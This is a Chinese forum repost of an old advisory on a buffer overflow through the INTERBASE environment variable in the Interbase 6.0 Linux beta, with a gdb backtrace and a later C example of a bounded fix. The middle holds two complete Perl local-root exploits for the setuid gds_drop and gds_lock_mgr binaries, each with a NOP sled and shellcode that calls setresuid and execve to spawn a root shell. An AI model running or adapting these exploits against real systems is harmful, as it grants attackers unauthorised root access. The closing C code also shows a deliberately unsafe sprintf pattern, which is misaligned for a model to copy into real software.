斑竹的菜园子

Author: borneol (administrator)
#1  Interbase 6.0 malloc() buffer overflow (Linux, vulnerability)

This is an article I collected a while back.
=====================================

Affected software:
Interbase 6.0 Linux beta

Description:
A buffer overflow in the Linux Interbase package lets a local user gain root without authorization.

Details:
interbase-6.0-1.i386.rpm ships on the Mandrake 7.2 CD. Several programs in this package read the "INTERBASE" environment variable, and a missing bounds check on its value allows a buffer overflow:

[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e 'print "A" x 500'`
[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop

The result, run under gdb, is:

(gdb) r
Starting program: /usr/local/interbase/bin/gds_drop

Program received signal SIGSEGV, Segmentation fault.
0x400a0832 in ptmalloc_init () at malloc.c:1696
1696 malloc.c: No such file or directory.
in malloc.c
(gdb) bt
#0 0x400a0832 in ptmalloc_init () at malloc.c:1696
#1 0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at
malloc.c:1856
#2 0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798
#3 0x40092571 in _IO_new_fopen (
filename=0xbfffd65c 'A' <repeats 200 times>..., mode=0x80583c0 "r")
at iofopen.c:50
#4 0x0804a244 in ISC_get_config ()
#5 0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Frame #5 (0x41414141) shows that by the time fopen() is reached, the saved return address of ISC_get_config has already been overwritten with bytes from the variable, so the attacker controls the instruction pointer as soon as that function returns. The following suid root programs are all potentially exposed:

/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr

With a suitable exploit script, a local user can gain root privileges.



Exploit:


#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
use strict;

# Optional offset added to the guessed stack address, for brute-forcing
# the landing point when the default guess misses the sled.
my $offset = shift(@ARGV) || 0;

# The payload lives in a separate environment variable: a 512-byte NOP
# sled followed by i386 Linux shellcode that calls setresuid(0,0,0)
# (eax=0xa4), then execve("/bin/sh") (eax=0xb), then exit(0).
my $sc = "\x90" x 512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

# The overflow string: 86 copies of the guessed sled address (344 bytes),
# so whichever 4-byte slot holds the saved return address receives the
# pointer, plus one trailing padding byte.
my $buf = pack("l", (0xbffffdc0 + $offset)) x 86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_drop");


#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
use strict;

# Optional offset added to the guessed stack address, for brute-forcing.
my $offset = shift(@ARGV) || 0;

# Same payload as the gds_drop exploit (512-byte NOP sled, then
# setresuid(0,0,0) / execve / exit), but the program to execute is
# /tmp/sh, which the attacker must place there beforehand, because
# gds_lock_mgr does not give an interactive shell.
my $sc = "\x90" x 512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

$ENV{"FOO"} = $sc;

# 86 copies of the guessed sled address (344 bytes) plus one padding byte.
my $buf = pack("l", (0xbffffdc0 + $offset)) x 86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_lock_mgr");


Solution:
Borland.com has not yet released a fix. Until one is available, remove the suid root bit from the three programs listed above.



2005-3-10 14:37
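The advisory describes the bug class (an environment variable copied into a fixed-size buffer with no length check) and the workaround (do not run the programs setuid) but shows neither in code. The following is an added example, not code from the advisory, Snosoft or Borland: a vulnerable path-building routine of the shape the backtrace points at, next to a bounded replacement, and the check a setuid program should make before trusting INTERBASE from its caller's environment. The buffer size, config file name, default root and all function names are assumptions, not Interbase's.

```c
/* Added example (not from the advisory, Snosoft or Borland code).
 * Buffer size, file name, default root and function names are
 * assumptions, not Interbase's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ISC_CONFIG_MAX   256                    /* assumed fixed buffer size */
#define ISC_CONFIG_FILE  "/isc_config"          /* assumed config file name */
#define ISC_DEFAULT_ROOT "/usr/local/interbase" /* assumed built-in root */

/* Vulnerable shape (shown, never called here): sprintf() writes as
 * many bytes as the caller supplies, so a 500-byte INTERBASE value
 * like the PoC above runs off the end of path[] and over the saved
 * return address (frame #5 = 0x41414141 in the backtrace). */
void build_config_path_unsafe(const char *root, char *out)
{
    char path[ISC_CONFIG_MAX];
    sprintf(path, "%s%s", root, ISC_CONFIG_FILE);   /* unbounded write */
    strcpy(out, path);
}

/* Bounded replacement: snprintf() never writes past outlen, and a
 * return value >= outlen means the input did not fit, which is
 * refused rather than silently truncated. 0 on success, -1 on error. */
int build_config_path(const char *root, char *out, size_t outlen)
{
    if (root == NULL || out == NULL || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s%s", root, ISC_CONFIG_FILE);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* A setuid program must not trust its caller's environment at all.
 * Honour INTERBASE only when the process runs with its own privilege;
 * otherwise use the compiled-in root (the policy ld.so applies to
 * LD_PRELOAD for setuid binaries). 'privileged' is a parameter so the
 * policy can be exercised without actually being setuid. */
const char *select_root(const char *env_value, int privileged)
{
    if (privileged || env_value == NULL || env_value[0] == '\0')
        return ISC_DEFAULT_ROOT;
    return env_value;
}

/* Real and effective ids differ when a setuid/setgid bit took effect. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Constructed input mirroring the PoC: 500 'A' bytes. Returns 1 if the
 * bounded builder refuses it instead of overflowing. */
int demo_rejects_poc_value(void)
{
    char big[501];
    char out[ISC_CONFIG_MAX];
    memset(big, 'A', 500);
    big[500] = '\0';
    return build_config_path(big, out, sizeof out) == -1;
}

/* Normal-sized value: returns 1 if the expected path is produced. */
int demo_builds_normal_path(void)
{
    char out[ISC_CONFIG_MAX];
    if (build_config_path("/opt/interbase", out, sizeof out) != 0)
        return 0;
    return strcmp(out, "/opt/interbase/isc_config") == 0;
}

/* Returns 1 if a privileged process ignores a hostile INTERBASE value. */
int demo_setuid_ignores_env(void)
{
    return strcmp(select_root("/tmp/evil", 1), ISC_DEFAULT_ROOT) == 0;
}

int main(void)
{
    const char *root = select_root(getenv("INTERBASE"), running_privileged());
    char out[ISC_CONFIG_MAX];
    if (build_config_path(root, out, sizeof out) != 0) {
        fprintf(stderr, "INTERBASE value too long, refusing\n");
        return 1;
    }
    printf("config path: %s\n", out);
    printf("rejects 500-byte PoC value: %d\n", demo_rejects_poc_value());
    return 0;
}
```

Run the binary with INTERBASE set to the 500-byte PoC value and it exits with an error instead of faulting; install it setuid and the variable is ignored entirely. Either measure alone closes the hole the advisory describes; the second is the one that matches the recommended workaround, since it removes the untrusted input rather than the privilege.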